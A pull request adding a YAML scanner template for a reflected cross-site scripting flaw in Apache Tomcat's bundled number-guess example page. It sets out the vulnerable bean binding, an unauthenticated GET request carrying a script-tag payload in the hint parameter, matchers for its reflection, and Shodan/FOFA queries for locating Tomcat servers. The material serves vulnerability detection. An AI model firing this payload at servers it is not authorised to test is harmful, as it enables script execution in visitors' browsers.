### PR TITLE
Add CVE-2026-50229 Apache Tomcat Number Guess XSS template

### DIFF
--- a/http/cves/2026/CVE-2026-50229.yaml
+++ b/http/cves/2026/CVE-2026-50229.yaml
@@ -5,13 +5,11 @@ info:
   author: yshahinzadeh,amirmsafari
   severity: medium
   description: |
-    Apache Tomcat bundles an "examples" web application whose "number guess" demo
-    (numguess.jsp) binds incoming request parameters to a session-scoped
-    NumberGuessBean using wildcard property mapping (property="*"). This causes the
-    JSP container to call a matching setter for every request parameter, allowing an
-    attacker to directly control the bean's "hint" property. The value is rendered
-    unescaped inside the "Try <b>...</b>" hint text, resulting in a reflected
-    cross-site scripting vulnerability. Exploitation is unauthenticated.
+    Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in the number guess example for Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.22, from 10.1.0-M1 through 10.1.55, from 9.0.0.M1 through 9.0.118, from 8.5.0 through 8.5.100, from 7.0.0 through 7.0.109. Other versions that have reached end of support may also be affected. Users are recommended to upgrade to version 11.0.23, 10.1.56 or 9.0.119, which fix the issue.
+  impact: |
+    Remote attackers can execute scripts in users' browsers, potentially stealing cookies or performing actions on behalf of users.
+  remediation: |
+    Upgrade to versions 11.0.23, 10.1.56, or 9.0.119 or later.
   reference:
     - https://lists.apache.org/thread/wlt2no8bw45zl1w8byop4zfqphldf5j0
     - https://www.cve.org/CVERecord?id=CVE-2026-50229
@@ -36,16 +34,18 @@ http:
 
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
-
-      - type: word
-        part: header
-        words:
-          - "text/html"
-
       - type: word
         part: body
         words:
           - '<script>alert(document.domain)</script>'
+          - 'Number Guess'
+        condition: and
+
+      - type: word
+        part: content_type
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200

--- a/http/cves/2026/CVE-2026-50229.yaml
+++ b/http/cves/2026/CVE-2026-50229.yaml
@@ -1,7 +1,7 @@
 id: CVE-2026-50229
 
 info:
-  name: Apache Tomcat - Cross-Site Scripting (XSS) in Number Guess Example
+  name: Apache Tomcat - Cross-Site Scripting
   author: yshahinzadeh,amirmsafari
   severity: medium
   description: |
@@ -25,7 +25,7 @@ info:
     product: tomcat
     shodan-query: html:"Apache Tomcat"
     fofa-query: app="APACHE-Tomcat"
-  tags: cve,cve2026,apache,tomcat,xss,examples,rxss
+  tags: cve,cve2026,apache,tomcat,xss
 
 http:
   - method: GET

--- a/http/cves/2026/CVE-2026-50229.yaml
+++ b/http/cves/2026/CVE-2026-50229.yaml
@@ -1,0 +1,51 @@
+id: CVE-2026-50229
+
+info:
+  name: Apache Tomcat - Cross-Site Scripting (XSS) in Number Guess Example
+  author: yshahinzadeh,amirmsafari
+  severity: medium
+  description: |
+    Apache Tomcat bundles an "examples" web application whose "number guess" demo
+    (numguess.jsp) binds incoming request parameters to a session-scoped
+    NumberGuessBean using wildcard property mapping (property="*"). This causes the
+    JSP container to call a matching setter for every request parameter, allowing an
+    attacker to directly control the bean's "hint" property. The value is rendered
+    unescaped inside the "Try <b>...</b>" hint text, resulting in a reflected
+    cross-site scripting vulnerability. Exploitation is unauthenticated.
+  reference:
+    - https://lists.apache.org/thread/wlt2no8bw45zl1w8byop4zfqphldf5j0
+    - https://www.cve.org/CVERecord?id=CVE-2026-50229
+    - https://tomcat.apache.org/security-11.html
+    - https://www.herodevs.com/vulnerability-directory/cve-2026-50229
+  classification:
+    cwe-id: CWE-80
+    cve-id: CVE-2026-50229
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: apache
+    product: tomcat
+    shodan-query: html:"Apache Tomcat"
+    fofa-query: app="APACHE-Tomcat"
+  tags: cve,cve2026,apache,tomcat,xss,examples,rxss
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/examples/jsp/num/numguess.jsp?guess=5&hint=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: word
+        part: body
+        words:
+          - '<script>alert(document.domain)</script>'


### PR DESCRIPTION
### Template / PR Requirements

Adds a new template for **CVE-2026-50229** - reflected XSS in the Apache Tomcat bundled `examples` webapp (`numguess.jsp`).

The Number Guess demo binds request parameters to a session-scoped `NumberGuessBean` via wildcard property mapping (`property="*"`), letting an attacker control the `hint` property, which is rendered unescaped inside the hint text. Unauthenticated reflected XSS.

- Detection is a single unauthenticated GET request.
- Matches on `200` status, `text/html` content-type, and the reflected `<script>alert(document.domain)</script>` payload in the body.

**References**
- https://lists.apache.org/thread/wlt2no8bw45zl1w8byop4zfqphldf5j0
- https://www.cve.org/CVERecord?id=CVE-2026-50229
- https://tomcat.apache.org/security-11.html
- https://www.herodevs.com/vulnerability-directory/cve-2026-50229